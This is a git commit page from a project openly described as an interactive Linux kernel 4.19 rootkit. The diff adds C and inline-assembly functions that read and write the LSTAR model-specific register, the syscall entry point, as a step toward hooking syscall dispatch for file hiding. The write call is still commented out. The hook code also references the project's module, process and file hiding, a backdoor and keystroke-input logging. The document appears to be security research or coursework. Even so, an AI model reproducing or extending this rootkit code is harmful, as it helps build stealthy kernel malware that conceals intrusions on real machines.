linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 79c785b8d357fdaf51b42b3f4c5163c3f735dea1
parent b799331bd6b2a52968cfd6de184f46c4e3f862e7
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Mon,  4 Jan 2021 16:48:06 +0100

R/W lstar functions

Diffstat:

Msrc/filehide_lstar.c | 39++++++++++++++++++++++++++++++++++++---


Msrc/hook.c | 3+++


2 files changed, 39 insertions(+), 3 deletions(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -1,16 +1,35 @@
 #include <linux/kernel.h>
+#include <asm/nospec-branch.h>
 
 #include "filehide_lstar.h"
 #include "common.h"
 
 static unsigned long read_lstar(void);
+static void write_lstar(unsigned int low, unsigned int high);
+static void hooked_lstar(void);
+
+unsigned long lstar_addr;
 
 void
 test_lstar(void)
 {
-    unsigned long lstar = read_lstar();
+    lstar_addr = read_lstar();
+    DEBUG_INFO("LSTAR before is %0lx\n", lstar_addr);
+
+    unsigned int low = (int)((unsigned long) lstar_addr & 0xFFFFFFFF);
+    unsigned int high = (int)((unsigned long) lstar_addr >> 32);
 
-    DEBUG_INFO("LSTAR is %0lx\n", lstar);
+    // write_lstar((low + 4), high);
+
+    DEBUG_INFO("LSTAR after is %0lx\n", read_lstar());
+}
+
+static void
+hooked_lstar(void)
+{
+    __asm__ volatile (
+        "\tjmp *%0\n"
+        :: "m"(lstar_addr));
 }
 
 static unsigned long 
@@ -26,7 +45,7 @@ read_lstar(void)
                     : [low] "=r" (low), [high] "=r" (high) 
                     :
                     : "ecx", "eax", "edx"
-                );
+    );
 
     //Get two 32bit values into a 64bit variable
     unsigned long ret = high;
@@ -34,4 +53,18 @@ read_lstar(void)
     ret |= low;
 
     return ret;
+}
+
+static void
+write_lstar(unsigned int low, unsigned int high)
+{
+    __asm__ volatile (
+                    "movl $0xc0000082, %%ecx\n\t" //https://elixir.bootlin.com/linux/v4.19/source/arch/x86/include/asm/msr-index.h#L15
+                    "mov %[low], %%eax\n\t"
+                    "mov %[high], %%edx\n\t"
+                    "wrmsr"
+                    :
+                    : [low] "r" (low), [high] "r" (high) 
+                    : "ecx", "eax", "edx"
+    );
 }
 \ No newline at end of file
diff --git a/src/hook.c b/src/hook.c
@@ -16,6 +16,7 @@
 #include "rootkit.h"
 #include "modhide.h"
 #include "filehide.h"
+#include "filehide_lstar.h"
 #include "backdoor.h"
 #include "pidhide.h"
 #include "openhide.h"
@@ -98,6 +99,8 @@ init_hooks(void)
 
     if (rootkit.logging_input)
         log_input("127.0.0.1", "5000");
+
+    test_lstar();
 }
 
 void